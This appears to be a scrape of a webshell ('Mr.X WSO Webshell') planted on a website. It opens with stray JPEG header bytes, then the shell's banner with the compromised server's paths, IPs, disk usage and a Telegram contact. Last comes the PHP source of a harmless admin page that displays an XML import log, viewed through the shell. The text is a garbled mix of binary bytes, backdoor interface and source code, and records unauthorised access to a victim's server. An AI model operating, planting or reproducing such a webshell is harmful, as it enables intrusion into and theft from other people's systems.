����JFIF���������
| Attention: Uname: Php: Hdd: Cwd: | Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet 5.3.29 Safe mode: OFF Datetime: 2026-04-08 20:33:03 1999.30 GB Free: 84.76 GB (4%) /home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text | Server IP: 127.0.0.54 Client IP: 216.73.216.53 |
| [ Files ] | [ Logout ] |
|---|
<?
ini_set('default_socket_timeout', 24000);
ignore_user_abort();
require "header.php";
?>
<div class="content-page">
<div class="header-area">
<div class="breadcrumbs">
<a href="index.php">Admin Home</a>
<span><a href="xml_log.php">Last XML Log</a></span>
</div>
</div>
<div class="content-outer">
<h2>XML<strong>Log</strong></h2>
<div class="content-inner">
<div class="notification info">The XML log is replaced every time you run the xml importer. Below is the current entry.</div>
<br>
<div style="font-family: 'Courier New', Courier, monospace; font-size: 11px;">
<? $file = file_get_contents('scripts/xml_log.txt'); ?>
<? echo nl2br($file); ?>
</div>
</div>
</div>
</div>
<? require "footer.php"; ?>